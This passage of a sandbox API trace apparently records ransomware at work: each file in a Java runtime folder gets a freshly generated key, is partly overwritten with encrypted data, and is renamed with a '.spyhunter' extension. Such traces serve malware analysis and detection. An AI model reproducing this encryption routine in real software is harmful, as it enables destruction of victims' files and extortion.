pdwDataLen=0x57e560*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e560*=0x30) returned 1 [0174.325] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\nio.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\nio.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0174.326] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\nio.dll") returned 48 [0174.326] StrStrW (lpFirst="nio.dll", lpSrch=".txt") returned 0x0 [0174.326] GetProcessHeap () returned 0x2c0000 [0174.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0174.327] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e524, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e524*=0x2800, lpOverlapped=0x0) returned 1 [0174.328] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.328] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e524, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e524*=0x2800, lpOverlapped=0x0) returned 1 [0174.329] GetProcessHeap () returned 0x2c0000 [0174.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0174.329] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.329] WriteFile (in: hFile=0x178, lpBuffer=0x57e564*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e524, lpOverlapped=0x0 | out: lpBuffer=0x57e564*, lpNumberOfBytesWritten=0x57e524*=0x4, lpOverlapped=0x0) returned 1 [0174.330] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e524, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e524*=0x30, lpOverlapped=0x0) returned 1 [0174.330] CloseHandle (hObject=0x178) returned 1 [0174.330] GetProcessHeap () returned 0x2c0000 [0174.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.331] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\nio.dll.spyhunter") returned 58 [0174.331] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\nio.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\nio.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\nio.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\nio.dll.spyhunter")) returned 1 [0174.332] GetProcessHeap () returned 0x2c0000 [0174.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.332] GetProcessHeap () returned 0x2c0000 [0174.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0174.332] GetProcessHeap () returned 0x2c0000 [0174.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21830 | out: hHeap=0x2c0000) returned 1 [0174.332] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e560 | out: pbBuffer=0x57e560) returned 1 [0174.332] GetProcessHeap () returned 0x2c0000 [0174.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0174.333] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e558*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e558*=0x30) returned 1 [0174.333] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\net.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\net.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0174.334] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\net.dll") returned 48 [0174.334] StrStrW (lpFirst="net.dll", lpSrch=".txt") returned 0x0 [0174.334] GetProcessHeap () returned 0x2c0000 [0174.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0174.334] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e51c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e51c*=0x2800, lpOverlapped=0x0) returned 1 [0174.436] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.436] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e51c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e51c*=0x2800, lpOverlapped=0x0) returned 1 [0174.436] GetProcessHeap () returned 0x2c0000 [0174.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0174.436] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.436] WriteFile (in: hFile=0x178, lpBuffer=0x57e55c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e51c, lpOverlapped=0x0 | out: lpBuffer=0x57e55c*, lpNumberOfBytesWritten=0x57e51c*=0x4, lpOverlapped=0x0) returned 1 [0174.471] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e51c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e51c*=0x30, lpOverlapped=0x0) returned 1 [0174.471] CloseHandle (hObject=0x178) returned 1 [0174.471] GetProcessHeap () returned 0x2c0000 [0174.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.472] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\net.dll.spyhunter") returned 58 [0174.472] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\net.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\net.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\net.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\net.dll.spyhunter")) returned 1 [0174.473] GetProcessHeap () returned 0x2c0000 [0174.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.473] GetProcessHeap () returned 0x2c0000 [0174.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0174.473] GetProcessHeap () returned 0x2c0000 [0174.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21780 | out: hHeap=0x2c0000) returned 1 [0174.473] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e560 | out: pbBuffer=0x57e560) returned 1 [0174.473] GetProcessHeap () returned 0x2c0000 [0174.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0174.473] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e558*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e558*=0x30) returned 1 [0174.473] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\klist.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\klist.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0174.474] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\klist.exe") returned 50 [0174.474] StrStrW (lpFirst="klist.exe", lpSrch=".txt") returned 0x0 [0174.474] GetProcessHeap () returned 0x2c0000 [0174.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0174.474] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e51c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e51c*=0x2800, lpOverlapped=0x0) returned 1 [0174.476] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.476] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e51c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e51c*=0x2800, lpOverlapped=0x0) returned 1 [0174.485] GetProcessHeap () returned 0x2c0000 [0174.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0174.485] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.485] WriteFile (in: hFile=0x178, lpBuffer=0x57e55c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e51c, lpOverlapped=0x0 | out: lpBuffer=0x57e55c*, lpNumberOfBytesWritten=0x57e51c*=0x4, lpOverlapped=0x0) returned 1 [0174.485] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e51c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e51c*=0x30, lpOverlapped=0x0) returned 1 [0174.485] CloseHandle (hObject=0x178) returned 1 [0174.485] GetProcessHeap () returned 0x2c0000 [0174.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.486] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\klist.exe.spyhunter") returned 60 [0174.486] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\klist.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\klist.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\klist.exe.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\klist.exe.spyhunter")) returned 1 [0174.487] GetProcessHeap () returned 0x2c0000 [0174.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.487] GetProcessHeap () returned 0x2c0000 [0174.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0174.487] GetProcessHeap () returned 0x2c0000 [0174.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21620 | out: hHeap=0x2c0000) returned 1 [0174.487] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e558 | out: pbBuffer=0x57e558) returned 1 [0174.487] GetProcessHeap () returned 0x2c0000 [0174.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0174.487] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e550*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e550*=0x30) returned 1 [0174.487] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\keytool.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\keytool.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0174.488] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\keytool.exe") returned 52 [0174.488] StrStrW (lpFirst="keytool.exe", lpSrch=".txt") returned 0x0 [0174.488] GetProcessHeap () returned 0x2c0000 [0174.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0174.488] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e514, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e514*=0x2800, lpOverlapped=0x0) returned 1 [0174.553] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.553] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e514, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e514*=0x2800, lpOverlapped=0x0) returned 1 [0174.554] GetProcessHeap () returned 0x2c0000 [0174.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0174.554] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.554] WriteFile (in: hFile=0x178, lpBuffer=0x57e554*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e514, lpOverlapped=0x0 | out: lpBuffer=0x57e554*, lpNumberOfBytesWritten=0x57e514*=0x4, lpOverlapped=0x0) returned 1 [0174.555] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e514, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e514*=0x30, lpOverlapped=0x0) returned 1 [0174.555] CloseHandle (hObject=0x178) returned 1 [0174.555] GetProcessHeap () returned 0x2c0000 [0174.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0174.555] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\keytool.exe.spyhunter") returned 62 [0174.555] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\keytool.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\keytool.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\keytool.exe.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\keytool.exe.spyhunter")) returned 1 [0174.557] GetProcessHeap () returned 0x2c0000 [0174.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0174.557] GetProcessHeap () returned 0x2c0000 [0174.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0174.557] GetProcessHeap () returned 0x2c0000 [0174.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed2c40 | out: hHeap=0x2c0000) returned 1 [0174.557] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e558 | out: pbBuffer=0x57e558) returned 1 [0174.557] GetProcessHeap () returned 0x2c0000 [0174.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0174.557] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e550*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e550*=0x30) returned 1 [0174.557] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jpioji.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jpioji.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0174.558] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jpioji.dll") returned 51 [0174.558] StrStrW (lpFirst="jpioji.dll", lpSrch=".txt") returned 0x0 [0174.558] GetProcessHeap () returned 0x2c0000 [0174.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0174.559] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e514, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e514*=0x2800, lpOverlapped=0x0) returned 1 [0174.560] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.579] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e514, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e514*=0x2800, lpOverlapped=0x0) returned 1 [0174.579] GetProcessHeap () returned 0x2c0000 [0174.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0174.579] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.579] WriteFile (in: hFile=0x178, lpBuffer=0x57e554*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e514, lpOverlapped=0x0 | out: lpBuffer=0x57e554*, lpNumberOfBytesWritten=0x57e514*=0x4, lpOverlapped=0x0) returned 1 [0174.588] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e514, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e514*=0x30, lpOverlapped=0x0) returned 1 [0174.588] CloseHandle (hObject=0x178) returned 1 [0174.588] GetProcessHeap () returned 0x2c0000 [0174.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.588] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jpioji.dll.spyhunter") returned 61 [0174.588] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jpioji.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jpioji.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jpioji.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jpioji.dll.spyhunter")) returned 1 [0174.590] GetProcessHeap () returned 0x2c0000 [0174.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.590] GetProcessHeap () returned 0x2c0000 [0174.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0174.590] GetProcessHeap () returned 0x2c0000 [0174.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21200 | out: hHeap=0x2c0000) returned 1 [0174.590] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e550 | out: pbBuffer=0x57e550) returned 1 [0174.590] GetProcessHeap () returned 0x2c0000 [0174.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0174.590] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e548*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e548*=0x30) returned 1 [0174.590] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jpicom.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jpicom.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0174.591] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jpicom.dll") returned 51 [0174.591] StrStrW (lpFirst="jpicom.dll", lpSrch=".txt") returned 0x0 [0174.591] GetProcessHeap () returned 0x2c0000 [0174.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0174.591] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e50c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e50c*=0x2800, lpOverlapped=0x0) returned 1 [0174.612] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.613] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e50c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e50c*=0x2800, lpOverlapped=0x0) returned 1 [0174.613] GetProcessHeap () returned 0x2c0000 [0174.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0174.613] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.613] WriteFile (in: hFile=0x178, lpBuffer=0x57e54c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e50c, lpOverlapped=0x0 | out: lpBuffer=0x57e54c*, lpNumberOfBytesWritten=0x57e50c*=0x4, lpOverlapped=0x0) returned 1 [0174.650] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e50c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e50c*=0x30, lpOverlapped=0x0) returned 1 [0174.651] CloseHandle (hObject=0x178) returned 1 [0174.658] GetProcessHeap () returned 0x2c0000 [0174.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.659] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jpicom.dll.spyhunter") returned 61 [0174.659] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jpicom.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jpicom.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jpicom.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jpicom.dll.spyhunter")) returned 1 [0174.660] GetProcessHeap () returned 0x2c0000 [0174.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.660] GetProcessHeap () returned 0x2c0000 [0174.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0174.660] GetProcessHeap () returned 0x2c0000 [0174.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c210a0 | out: hHeap=0x2c0000) returned 1 [0174.660] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e550 | out: pbBuffer=0x57e550) returned 1 [0174.660] GetProcessHeap () returned 0x2c0000 [0174.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0174.660] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e548*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e548*=0x30) returned 1 [0174.660] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jp2iexp.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jp2iexp.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0174.661] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jp2iexp.dll") returned 52 [0174.661] StrStrW (lpFirst="jp2iexp.dll", lpSrch=".txt") returned 0x0 [0174.661] GetProcessHeap () returned 0x2c0000 [0174.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0174.661] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e50c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e50c*=0x2800, lpOverlapped=0x0) returned 1 [0174.727] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.727] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e50c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e50c*=0x2800, lpOverlapped=0x0) returned 1 [0174.727] GetProcessHeap () returned 0x2c0000 [0174.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0174.727] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.728] WriteFile (in: hFile=0x178, lpBuffer=0x57e54c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e50c, lpOverlapped=0x0 | out: lpBuffer=0x57e54c*, lpNumberOfBytesWritten=0x57e50c*=0x4, lpOverlapped=0x0) returned 1 [0174.828] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e50c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e50c*=0x30, lpOverlapped=0x0) returned 1 [0174.828] CloseHandle (hObject=0x178) returned 1 [0174.828] GetProcessHeap () returned 0x2c0000 [0174.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.828] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jp2iexp.dll.spyhunter") returned 62 [0174.828] MoveFileW 